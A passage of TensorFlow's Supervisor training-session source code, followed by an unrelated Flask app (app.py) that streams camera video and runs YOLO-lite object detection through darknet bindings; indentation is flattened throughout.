This feed dictionary will be used when `init_op` is evaluated.
local_init_op: `Operation`. Used by all supervisors to run initializations
that should run for every new supervisor instance. By default these
are table initializers and initializers for local variables.
If `None`, no further per supervisor-instance initialization is
done automatically.
logdir: A string. Optional path to a directory where to checkpoint the
model and log events for the visualizer. Used by chief supervisors.
The directory will be created if it does not exist.
summary_op: An `Operation` that returns a Summary for the event logs.
Used by chief supervisors if a `logdir` was specified. Defaults to the
operation returned from summary.merge_all(). If `None`, summaries are
not computed automatically.
saver: A Saver object. Used by chief supervisors if a `logdir` was
specified. Defaults to the saved returned by Saver().
If `None`, the model is not saved automatically.
global_step: An integer Tensor of size 1 that counts steps. The value
from 'global_step' is used in summaries and checkpoint filenames.
Default to the op named 'global_step' in the graph if it exists, is of
rank 1, size 1, and of type tf.int32 or tf.int64. If `None` the global
step is not recorded in summaries and checkpoint files. Used by chief
supervisors if a `logdir` was specified.
save_summaries_secs: Number of seconds between the computation of
summaries for the event log. Defaults to 120 seconds. Pass 0 to
disable summaries.
save_model_secs: Number of seconds between the creation of model
checkpoints. Defaults to 600 seconds. Pass 0 to disable checkpoints.
recovery_wait_secs: Number of seconds between checks that the model
is ready. Used by supervisors when waiting for a chief supervisor
to initialize or restore the model. Defaults to 30 seconds.
stop_grace_secs: Grace period, in seconds, given to running threads to
stop when `stop()` is called. Defaults to 120 seconds.
checkpoint_basename: The basename for checkpoint saving.
session_manager: `SessionManager`, which manages Session creation and
recovery. If it is `None`, a default `SessionManager` will be created
with the set of arguments passed in for backwards compatibility.
summary_writer: `SummaryWriter` to use or `USE_DEFAULT`. Can be `None`
to indicate that no summaries should be written.
init_fn: Optional callable used to initialize the model. Called
after the optional `init_op` is called. The callable must accept one
argument, the session being initialized.
Returns:
A `Supervisor`.
"""
# Set default values of arguments.
if graph is None:
graph = ops.get_default_graph()
with graph.as_default():
self._init_ready_op(
ready_op=ready_op, ready_for_local_init_op=ready_for_local_init_op)
self._init_init_op(init_op=init_op, init_feed_dict=init_feed_dict)
self._init_local_init_op(local_init_op=local_init_op)
self._init_saver(saver=saver)
self._init_summary_op(summary_op=summary_op)
self._init_global_step(global_step=global_step)
self._graph = graph
self._meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True),
saver_def=self._saver.saver_def if self._saver else None)
self._is_chief = is_chief
self._coord = coordinator.Coordinator()
self._recovery_wait_secs = recovery_wait_secs
self._stop_grace_secs = stop_grace_secs
self._init_fn = init_fn
# Set all attributes related to checkpointing and writing events to None.
# Afterwards, set them appropriately for chief supervisors, as these are
# the only supervisors that can write checkpoints and events.
self._logdir = None
self._save_summaries_secs = None
self._save_model_secs = None
self._save_path = None
self._summary_writer = None
if self._is_chief:
self._logdir = logdir
self._save_summaries_secs = save_summaries_secs
self._save_model_secs = save_model_secs
if self._logdir:
self._save_path = os.path.join(self._logdir, checkpoint_basename)
if summary_writer is Supervisor.USE_DEFAULT:
if self._logdir:
self._summary_writer = summary_io.SummaryWriter(self._logdir)
else:
self._summary_writer = summary_writer
self._graph_added_to_summary = False
self._init_session_manager(session_manager=session_manager)
self._verify_setup()
# The graph is not allowed to change anymore.
graph.finalize()
def _init_session_manager(self, session_manager=None):
if session_manager is None:
self._session_manager = session_manager_mod.SessionManager(
local_init_op=self._local_init_op,
ready_op=self._ready_op,
ready_for_local_init_op=self._ready_for_local_init_op,
graph=self._graph,
recovery_wait_secs=self._recovery_wait_secs)
else:
self._session_manager = session_manager
def _get_first_op_from_collection(self, key):
"""Returns the first `Operation` from a collection.
Args:
key: A string collection key.
Returns:
The first Op found in a collection, or `None` if the collection is empty.
"""
try:
op_list = ops.get_collection(key)
if len(op_list) > 1:
logging.info("Found %d %s operations. Returning the first one.",
len(op_list), key)
if op_list:
return op_list[0]
except LookupError:
pass
return None
def _init_ready_op(self,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT):
"""Initializes ready_op.
Args:
ready_op: `Tensor` to check if the model is initialized.
If it's set to USE_DEFAULT, creates an op that checks all
the variables are initialized.
ready_for_local_init_op: `Tensor` to check if the model is ready to run
local_init_op.
If it's set to USE_DEFAULT, creates an op that checks all
the global variables are initialized.
"""
if ready_op is Supervisor.USE_DEFAULT:
ready_op = self._get_first_op_from_collection(ops.GraphKeys.READY_OP)
if ready_op is None:
ready_op = variables.report_uninitialized_variables()
ops.add_to_collection(ops.GraphKeys.READY_OP, ready_op)
self._ready_op = ready_op
# ready_for_local_init_op defaults to None for backward compatibility
if ready_for_local_init_op is Supervisor.USE_DEFAULT:
ready_for_local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.READY_FOR_LOCAL_INIT_OP)
self._ready_for_local_init_op = ready_for_local_init_op
def _init_init_op(self, init_op=USE_DEFAULT, init_feed_dict=None):
"""Initializes init_op.
Args:
init_op: `Operation` to initialize the variables. If set to USE_DEFAULT,
create an op that initializes all variables and tables.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
"""
if init_op is Supervisor.USE_DEFAULT:
init_op = self._get_first_op_from_collection(ops.GraphKeys.INIT_OP)
if init_op is None:
init_op = variables.global_variables_initializer()
ops.add_to_collection(ops.GraphKeys.INIT_OP, init_op)
self._init_op = init_op
self._init_feed_dict = init_feed_dict
def _init_local_init_op(self, local_init_op=USE_DEFAULT):
"""Initializes local_init_op.
Args:
local_init_op: `Operation` run for every new supervisor instance. If set
to USE_DEFAULT, use the first op from the GraphKeys.LOCAL_INIT_OP
collection. If the collection is empty, create an op that initializes
all local variables and all tables.
"""
if local_init_op is Supervisor.USE_DEFAULT:
local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.LOCAL_INIT_OP)
if local_init_op is None:
op_list = [variables.local_variables_initializer(),
data_flow_ops.initialize_all_tables()]
if op_list:
local_init_op = control_flow_ops.group(*op_list)
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
self._local_init_op = local_init_op
def _init_saver(self, saver=USE_DEFAULT):
"""Initializes saver.
Args:
saver: A `Saver` object. If set to USE_DEFAULT, create one that
saves all the variables.
"""
if saver is Supervisor.USE_DEFAULT:
saver = self._get_first_op_from_collection(ops.GraphKeys.SAVERS)
if saver is None and variables.global_variables():
saver = saver_mod.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
self._saver = saver
def _init_summary_op(self, summary_op=USE_DEFAULT):
"""Initializes summary_op.
Args:
summary_op: An Operation that returns a Summary for the event logs.
If set to USE_DEFAULT, create an op that merges all the summaries.
"""
if summary_op is Supervisor.USE_DEFAULT:
summary_op = self._get_first_op_from_collection(ops.GraphKeys.SUMMARY_OP)
if summary_op is None:
summary_op = _summary.merge_all()
if summary_op is not None:
ops.add_to_collection(ops.GraphKeys.SUMMARY_OP, summary_op)
self._summary_op = summary_op
def _init_global_step(self, global_step=USE_DEFAULT):
"""Initializes global_step.
Args:
global_step: An integer Tensor of size 1 that counts steps. If
set to USE_DEFAULT, creates global_step tensor.
"""
if global_step is Supervisor.USE_DEFAULT:
global_step = self._get_first_op_from_collection(
ops.GraphKeys.GLOBAL_STEP)
if global_step is None:
global_step = self._default_global_step_tensor()
if global_step is not None:
ops.add_to_collection(ops.GraphKeys.GLOBAL_STEP, global_step)
self._global_step = global_step
@property
def is_chief(self):
"""Return True if this is a chief supervisor.
Returns:
A bool.
"""
return self._is_chief
@property
def session_manager(self):
"""Return the SessionManager used by the Supervisor.
Returns:
A SessionManager object.
"""
return self._session_manager
@property
def coord(self):
"""Return the Coordinator used by the Supervisor.
The Coordinator can be useful if you want to run multiple threads
during your training.
Returns:
A Coordinator object.
"""
return self._coord
@property
def init_op(self):
"""Return the Init Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._init_op
@property
def init_feed_dict(self):
"""Return the feed dictionary used when evaluating the `init_op`.
Returns:
A feed dictionary or `None`.
"""
return self._init_feed_dict
@property
def ready_op(self):
"""Return the Ready Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._ready_op
@property
def ready_for_local_init_op(self):
return self._ready_for_local_init_op
@property
def summary_writer(self):
"""Return the SummaryWriter used by the chief supervisor.
Returns:
A SummaryWriter.
"""
return self._summary_writer
@property
def summary_op(self):
"""Return the Summary Tensor used by the chief supervisor.
Returns:
A string Tensor for the summary or `None`.
"""
return self._summary_op
@property
def save_summaries_secs(self):
"""Return the delay between summary computations.
Returns:
A timestamp.
"""
return self._save_summaries_secs
@property
def global_step(self):
"""Return the global_step Tensor used by the supervisor.
Returns:
An integer Tensor for the global_step.
"""
return self._global_step
@property
def saver(self):
"""Return the Saver used by the supervisor.
Returns:
A Saver object.
"""
return self._saver
@property
def save_model_secs(self):
"""Return the delay between checkpoints.
Returns:
A timestamp.
"""
return self._save_model_secs
@property
def save_path(self):
"""Return the save path used by the supervisor.
Returns:
A string.
"""
return self._save_path
def _write_graph(self):
"""Writes graph_def to `logdir` and adds it to summary if applicable."""
assert self._is_chief
if self._logdir:
training_util.write_graph(self._graph.as_graph_def(add_shapes=True),
self._logdir, "graph.pbtxt")
if self._summary_writer and not self._graph_added_to_summary:
self._summary_writer.add_graph(self._graph)
self._summary_writer.add_meta_graph(self._meta_graph_def)
self._graph_added_to_summary = True
def start_standard_services(self, sess):
"""Start the standard services for 'sess'.
This starts services in the background. The services started depend
on the parameters to the constructor and may include:
- A Summary thread computing summaries every save_summaries_secs.
- A Checkpoint thread saving the model every save_model_secs.
- A StepCounter thread measure step time.
Args:
sess: A Session.
Returns:
A list of threads that are running the standard services. You can use
the Supervisor's Coordinator to join these threads with:
sv.coord.Join(<list of threads>)
Raises:
RuntimeError: If called with a non-chief Supervisor.
ValueError: If not `logdir` was passed to the constructor as the
services need a log directory.
"""
if not self._is_chief:
raise RuntimeError("Only chief supervisor can start standard services. "
"Because only chief supervisors can write events.")
if not self._logdir:
logging.warning("Standard services need a 'logdir' "
"passed to the SessionManager")
return
if self._global_step is not None and self._summary_writer:
# Only add the session log if we keep track of global step.
# TensorBoard cannot use START message for purging expired events
# if there is no step value.
current_step = training_util.global_step(sess, self._global_step)
self._summary_writer.add_session_log(
SessionLog(status=SessionLog.START),
current_step)
threads = []
if self._save_summaries_secs and self._summary_writer:
if self._summary_op is not None:
threads.append(SVSummaryThread(self, sess))
if self._global_step is not None:
threads.append(SVStepCounterThread(self, sess))
if self.saver and self._save_model_secs:
threads.append(SVTimerCheckpointThread(self, sess))
for t in threads:
t.start()
return threads
def prepare_or_wait_for_session(self, master="", config=None,
wait_for_checkpoint=False,
max_wait_secs=7200,
start_standard_services=True):
"""Make sure the model is ready to be used.
Create a session on 'master', recovering or initializing the model as
needed, or wait for a session to be ready. If running as the chief
and `start_standard_service` is set to True, also call the session
manager to start the standard services.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional ConfigProto proto used to configure the session,
which is passed as-is to create the session.
wait_for_checkpoint: Whether we should wait for the availability of a
checkpoint before creating Session. Defaults to False.
max_wait_secs: Maximum time to wait for the session to become available.
start_standard_services: Whether to start the standard services and the
queue runners.
Returns:
A Session object that can be used to drive the model.
"""
# For users who recreate the session with prepare_or_wait_for_session(), we
# need to clear the coordinator's stop_event so that threads managed by the
# coordinator can run.
self._coord.clear_stop()
if self._summary_writer:
self._summary_writer.reopen()
if self._is_chief:
sess = self._session_manager.prepare_session(
master, init_op=self.init_op, saver=self.saver,
checkpoint_dir=self._logdir, wait_for_checkpoint=wait_for_checkpoint,
max_wait_secs=max_wait_secs, config=config,
init_feed_dict=self._init_feed_dict, init_fn=self._init_fn)
self._write_graph()
if start_standard_services:
self.start_standard_services(sess)
else:
sess = self._session_manager.wait_for_session(master,
config=config,
max_wait_secs=max_wait_secs)
if start_standard_services:
self.start_queue_runners(sess)
return sess
def start_queue_runners(self, sess, queue_runners=None):
"""Start threads for `QueueRunners`.
Note that the queue runners collected in the graph key `QUEUE_RUNNERS`
are already started automatically when you create a session with the
supervisor, so unless you have non-collected queue runners to start
you do not need to call this explicitly.
Args:
sess: A `Session`.
queue_runners: A list of `QueueRunners`. If not specified, we'll use the
list of queue runners gathered in the graph under the key
`GraphKeys.QUEUE_RUNNERS`.
Returns:
The list of threads started for the `QueueRunners`.
"""
if queue_runners is None:
queue_runners = self._graph.get_collection(ops.GraphKeys.QUEUE_RUNNERS)
threads = []
for qr in queue_runners:
threads.extend(qr.create_threads(sess, coord=self._coord, daemon=True,
start=True))
return threads
def loop(self, timer_interval_secs, target, args=None, kwargs=None):
"""Start a LooperThread that calls a function periodically.
If `timer_interval_secs` is None the thread calls `target(*args, **kwargs)`
repeatedly. Otherwise it calls it every `timer_interval_secs`
seconds. The thread terminates when a stop is requested.
The started thread is added to the list of threads managed by the supervisor
so it does not need to be passed to the `stop()` method.
Args:
timer_interval_secs: Number. Time boundaries at which to call `target`.
target: A callable object.
args: Optional arguments to pass to `target` when calling it.
kwargs: Optional keyword arguments to pass to `target` when calling it.
Returns:
The started thread.
"""
looper = coordinator.LooperThread(self._coord, timer_interval_secs,
target=target, args=args, kwargs=kwargs)
looper.start()
return looper
def stop(self, threads=None, close_summary_writer=True):
"""Stop the services and the coordinator.
This does not close the session.
Args:
threads: Optional list of threads to join with the coordinator. If
`None`, defaults to the threads running the standard services, the
threads started for `QueueRunners`, and the threads started by the
`loop()` method. To wait on additional threads, pass the
list in this parameter.
close_summary_writer: Whether to close the `summary_writer`. Defaults to
`True` if the summary writer was created by the supervisor, `False`
otherwise.
"""
self._coord.request_stop()
try:
# coord.join() re-raises the first reported exception; the "finally"
# block ensures that we clean up whether or not an exception was
# reported.
self._coord.join(threads,
stop_grace_period_secs=self._stop_grace_secs)
finally:
# Close the writer last, in case one of the running threads was using it.
if close_summary_writer and self._summary_writer:
# Stop messages are not logged with event.step,
# since the session may have already terminated.
self._summary_writer.add_session_log(SessionLog(status=SessionLog.STOP))
self._summary_writer.close()
self._graph_added_to_summary = False
def request_stop(self, ex=None):
"""Request that the coordinator stop the threads.
See `Coordinator.request_stop()`.
Args:
ex: Optional `Exception`, or Python `exc_info` tuple as returned by
`sys.exc_info()`. If this is the first call to `request_stop()` the
corresponding exception is recorded and re-raised from `join()`.
"""
self._coord.request_stop(ex=ex)
def should_stop(self):
"""Check if the coordinator was told to stop.
See `Coordinator.should_stop()`.
Returns:
True if the coordinator was told to stop, False otherwise.
"""
return self._coord.should_stop()
def stop_on_exception(self):
"""Context handler to stop the supervisor when an exception is raised.
See `Coordinator.stop_on_exception()`.
Returns:
A context handler.
"""
return self._coord.stop_on_exception()
def wait_for_stop(self):
"""Block waiting for the coordinator to stop."""
self._coord.wait_for_stop()
def summary_computed(self, sess, summary, global_step=None):
"""Indicate that a summary was computed.
Args:
sess: A `Session` object.
summary: A Summary proto, or a string holding a serialized summary proto.
global_step: Int. global step this summary is associated with. If `None`,
it will try to fetch the current step.
Raises:
TypeError: if 'summary' is not a Summary proto or a string.
RuntimeError: if the Supervisor was created without a `logdir`.
"""
if not self._summary_writer:
raise RuntimeError("Writing a summary requires a summary writer.")
if global_step is None and self.global_step is not None:
global_step = training_util.global_step(sess, self.global_step)
self._summary_writer.add_summary(summary, global_step)
def _default_global_step_tensor(self):
"""Returns the global_step from the default graph.
Returns:
The global step `Tensor` or `None`.
"""
try:
gs = ops.get_default_graph().get_tensor_by_name("global_step:0")
if gs.dtype.base_dtype in [dtypes.int32, dtypes.int64]:
return gs
else:
logging.warning("Found 'global_step' is not an int type: %s", gs.dtype)
return None
except KeyError:
return None
def _verify_setup(self):
"""Check that all is good.
Raises:
ValueError: If something is not good.
"""
# Not running as chief means that replicas are used.
# In that case all Variables must have their device set.
if not self._is_chief:
for op in self._graph.get_operations():
if op.type in ["Variable", "VariableV2"] and not op.device:
raise ValueError("When using replicas, all Variables must have "
"their device set: %s" % op)
# pylint: disable=g-doc-return-or-yield,broad-except
@contextlib.contextmanager
def managed_session(self, master="", config=None,
start_standard_services=True,
close_summary_writer=True):
"""Returns a context manager for a managed session.
This context manager creates and automatically recovers a session. It
optionally starts the standard services that handle checkpoints and
summaries. It monitors exceptions raised from the `with` block or from the
services and stops the supervisor as needed.
The context manager is typically used as follows:
```python
def train():
sv = tf.train.Supervisor(...)
with sv.managed_session(<master>) as sess:
for step in xrange(..):
if sv.should_stop():
break
sess.run(<my training op>)
...do other things needed at each training step...
```
An exception raised from the `with` block or one of the service threads is
raised again when the block exits. This is done after stopping all threads
and closing the session. For example, an `AbortedError` exception, raised
in case of preemption of one of the workers in a distributed model, is
raised again when the block exits.
If you want to retry the training loop in case of preemption you can do it
as follows:
```python
def main(...):
while True
try:
train()
except tf.errors.Aborted:
pass
```
As a special case, exceptions used for control flow, such as
`OutOfRangeError` which reports that input queues are exhausted, are not
raised again from the `with` block: they indicate a clean termination of
the training loop and are considered normal termination.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional `ConfigProto` proto used to configure the session.
Passed as-is to create the session.
start_standard_services: Whether to start the standard services,
such as checkpoint, summary and step counter.
close_summary_writer: Whether to close the summary writer when
closing the session. Defaults to True.
Returns:
A context manager that yields a `Session` restored from the latest
checkpoint or initialized from scratch if not checkpoint exists. The
session is closed when the `with` block exits.
"""
try:
sess = self.prepare_or_wait_for_session(
master=master, config=config,
start_standard_services=start_standard_services)
yield sess
except Exception as e:
self.request_stop(e)
finally:
try:
# Request all the threads to stop and wait for them to do so. Any
# exception raised by the threads is raised again from stop().
# Passing stop_grace_period_secs is for blocked enqueue/dequeue
# threads which are not checking for `should_stop()`. They
# will be stopped when we close the session further down.
self.stop(close_summary_writer=close_summary_writer)
finally:
# Close the session to finish up all pending calls. We do not care
# about exceptions raised when closing. This takes care of
# blocked enqueue/dequeue calls.
try:
sess.close()
except Exception:
# Silently ignore exceptions raised by close().
pass
# pylint: enable=g-doc-return-or-yield,broad-except
class SVSummaryThread(coordinator.LooperThread):
"""A thread to save summaries on a timer."""
def __init__(self, sv, sess):
"""Create a SVSummaryThread.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVSummaryThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
if self._sv.global_step is not None:
summary_strs, global_step = self._sess.run([self._sv.summary_op,
self._sv.global_step])
else:
summary_strs = self._sess.run(self._sv.summary_op)
global_step = None
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary_strs, global_step)
class SVStepCounterThread(coordinator.LooperThread):
"""Threads to count steps and measure their duration."""
def __init__(self, sv, sess):
"""Create a `SVStepCounterThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVStepCounterThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
self._last_time = 0.0
self._last_step = 0
self._summary_tag = "%s/sec" % self._sv.global_step.op.name
def start_loop(self):
self._last_time = time.time()
self._last_step = training_util.global_step(
self._sess, self._sv.global_step)
def run_loop(self):
# Count the steps.
current_step = training_util.global_step(self._sess, self._sv.global_step)
added_steps = current_step - self._last_step
self._last_step = current_step
# Measure the elapsed time.
current_time = time.time()
elapsed_time = current_time - self._last_time
self._last_time = current_time
# Reports the number of steps done per second
steps_per_sec = added_steps / elapsed_time
summary = Summary(value=[Summary.Value(tag=self._summary_tag,
simple_value=steps_per_sec)])
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary, current_step)
logging.log_first_n(logging.INFO, "%s: %g", 10,
self._summary_tag, steps_per_sec)
class SVTimerCheckpointThread(coordinator.LooperThread):
"""A thread to checkpoint on a timer."""
def __init__(self, sv, sess):
"""Create a `SVTimerCheckpointThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVTimerCheckpointThread, self).__init__(sv.coord, sv.save_model_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
self._sv.saver.save(self._sess, self._sv.save_path,
global_step=self._sv.global_step)
if self._sv.summary_writer and self._sv.global_step is not None:
current_step = training_util.global_step(self._sess, self._sv.global_step)
self._sv.summary_writer.add_session_log(
SessionLog(status=SessionLog.CHECKPOINT,
checkpoint_path=self._sv.save_path),
current_step)
# TODO(sherrym): All non-PEP8 compliant names will be deprecated shortly.
setattr(Supervisor, "PrepareSession", Supervisor.prepare_or_wait_for_session)
setattr(Supervisor, "StartQueueRunners", Supervisor.start_queue_runners)
setattr(Supervisor, "StartStandardServices", Supervisor.start_standard_services)
setattr(Supervisor, "Stop", Supervisor.stop)
setattr(Supervisor, "RequestStop", Supervisor.request_stop)
setattr(Supervisor, "Loop", Supervisor.loop)
setattr(Supervisor, "ShouldStop", Supervisor.should_stop)
setattr(Supervisor, "StopOnException", Supervisor.stop_on_exception)
setattr(Supervisor, "WaitForStop", Supervisor.wait_for_stop)
setattr(Supervisor, "SummaryComputed", Supervisor.summary_computed)
|
app.py
|
'''
author(s): xujing from Medcare
date: 2019-03-20
flask调用opencv并基于yolo-lite做目标检测。
解决了:
在html中嵌入opencv视频流
opencv putText的中文显示
darknet调用yolo-lite
多线程,多点同时访问
ajax异步更新echarts的json数据,实时绘制识别结果!
问题: yolo-lite在no-GPU下的识别FPS没有做到paper中说的那么高!
'''
from flask import Response
from flask import Flask
from flask import render_template
import os
import uuid
import threading
import argparse
from ctypes import *
import math
import random
import numpy as np
import configparser
import imutils
import cv2
from imutils.video import VideoStream
from PIL import Image,ImageDraw,ImageFont
import matplotlib.cm as mpcm
import datetime
import time
from pyecharts.charts import Bar
from pyecharts import options as opts
app = Flask(__name__)
outputFrame = None
temp_str = str(uuid.uuid1())
print(temp_str)
lock = threading.Lock()
config = configparser.ConfigParser()
config.read('config.ini')
if config['IPCapture']['IP'] != 'no':
# vs = VideoStream(src= config['IPCapture']['IP']).start() # ip摄像头
vs = cv2.VideoCapture(config['IPCapture']['IP']) # ip摄像头
elif config['USBCapture']['USB'] != 'no':
# vs = VideoStream(src=0).start() # USB摄像头或采集卡设备
vs = cv2.VideoCapture(0) # USB摄像头或采集卡设备
elif config['PiCamera']['PI'] != 'no':
# vs = VideoStream(usePiCamera=1).start() # 树莓派
vs = cv2.VideoCapture(1) # 树莓派
elif config['VideoPath']['PATH'] != 'no':
# vs = VideoStream(src="test.mp4").start() # 本地视频源
vs = cv2.VideoCapture("test.mp4") # 本地视频源
hasGPU = config['Device']['Device']
label_name = ['aeroplane','bicycle','bird','boat','bottle','bus','car','cat','chair','cow',
'diningtable','dog','horse','motorbike','person','pottedplant','sheep','sofa','train','tvmonitor']
probs = [0.0] * len(label_name)
time.sleep(2.0)
# ---------------------------通过darknet调用yolo-lite--------------------------------
def change_cv2_draw(image,strs,local,sizes,colour):
'''解决openCV putText中文显示问题
'''
cv2img = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)
pilimg = Image.fromarray(cv2img)
draw = ImageDraw.Draw(pilimg)
font = ImageFont.truetype("./static/fonts/Microsoft-Yahei-UI-Light.ttc",sizes,encoding='utf-8')
draw.text(local,strs,colour,font=font)
image = cv2.cvtColor(np.array(pilimg),cv2.COLOR_RGB2BGR)
return image
def colors_subselect(colors, num_classes=20):
'''颜色映射
'''
dt = len(colors) // num_classes
sub_colors = []
for i in range(num_classes):
color = colors[i*dt]
if isinstance(color[0], float):
sub_colors.append([int(c * 255) for c in color])
else:
sub_colors.append([c for c in color])
return sub_colors
colors = colors_subselect(mpcm.plasma.colors, num_classes=20)
colors_tableau = [(255, 152, 150),(148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),
(227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),
(188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229),
(188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229),
(255, 152, 150),(148, 103, 189), (197, 176, 213)]
# 调用darknet需要的一些方法
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int),
("uc", POINTER(c_float))]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
if os.name == "nt":
cwd = os.path.dirname(__file__)
os.environ['PATH'] = cwd + ';' + os.environ['PATH']
if hasGPU == "True":
winGPUdll = os.path.join(cwd, "yolo_cpp_dll.dll") # GPU!
lib = CDLL(winGPUdll, RTLD_GLOBAL)
else:
winNoGPUdll = os.path.join(cwd, "yolo_cpp_dll_no_gpu.dll")
lib = CDLL(winNoGPUdll, RTLD_GLOBAL)
else:
lib = CDLL("./libdarknet.so", RTLD_GLOBAL) # Lunix
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
copy_image_from_bytes = lib.copy_image_from_bytes
copy_image_from_bytes.argtypes = [IMAGE,c_char_p]
def network_width(net):
return lib.network_width(net)
def network_height(net):
return lib.network_height(net)
predict = lib.network_predict_ptr
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
if hasGPU:
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int), c_int]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict_ptr
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
load_net_custom = lib.load_network_custom
load_net_custom.argtypes = [c_char_p, c_char_p, c_int, c_int]
load_net_custom.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE]
predict_image.restype = POINTER(c_float)
predict_image_letterbox = lib.network_predict_image_letterbox
predict_image_letterbox.argtypes = [c_void_p, IMAGE]
predict_image_letterbox.restype = POINTER(c_float)
def array_to_image(arr):
import numpy as np
# need to return old values to avoid python freeing memory
arr = arr.transpose(2,0,1)
c = arr.shape[0]
h = arr.shape[1]
w = arr.shape[2]
arr = np.ascontiguousarray(arr.flat, dtype=np.float32) / 255.0
data = arr.ctypes.data_as(POINTER(c_float))
im = IMAGE(w,h,c,data)
return im, arr
def classify(net, meta, im):
out = predict_image(net, im)
res = []
for i in range(meta.classes):
if altNames is None:
nameTag = meta.names[i]
else:
nameTag = altNames[i]
res.append((nameTag, out[i]))
res = sorted(res, key=lambda x: -x[1])
return res
def detect(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45, debug= False):
"""
Performs the meat of the detection
"""
im = load_image(image, 0, 0)
if debug: print("Loaded image")
ret = detect_image(net, meta, im, thresh, hier_thresh, nms, debug)
free_image(im)
if debug: print("freed image")
return ret
def detect_image(net, meta, im, thresh=.5, hier_thresh=.5, nms=.45, debug= False):
num = c_int(0)
if debug: print("Assigned num")
pnum = pointer(num)
if debug: print("Assigned pnum")
predict_image(net, im)
letter_box = 0
#predict_image_letterbox(net, im)
#letter_box = 1
if debug: print("did prediction")
#dets = get_network_boxes(net, custom_image_bgr.shape[1], custom_image_bgr.shape[0], thresh, hier_thresh, None, 0, pnum, letter_box) # OpenCV
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum, letter_box)
if debug: print("Got dets")
num = pnum[0]
if debug: print("got zeroth index of pnum")
if nms:
do_nms_sort(dets, num, meta.classes, nms)
if debug: print("did sort")
res = []
if debug: print("about to range")
for j in range(num):
if debug: print("Ranging on "+str(j)+" of "+str(num))
if debug: print("Classes: "+str(meta), meta.classes, meta.names)
for i in range(meta.classes):
if debug: print("Class-ranging on "+str(i)+" of "+str(meta.classes)+"= "+str(dets[j].prob[i]))
if dets[j].prob[i] > 0:
b = dets[j].bbox
if altNames is None:
nameTag = meta.names[i]
else:
nameTag = altNames[i]
if debug:
print("Got bbox", b)
print(nameTag)
print(dets[j].prob[i])
print((b.x, b.y, b.w, b.h))
res.append((nameTag, dets[j].prob[i], (b.x, b.y, b.w, b.h)))
if debug: print("did range")
res = sorted(res, key=lambda x: -x[1])
if debug: print("did sort")
free_detections(dets, num)
if debug: print("freed detections")
return res
netMain = None
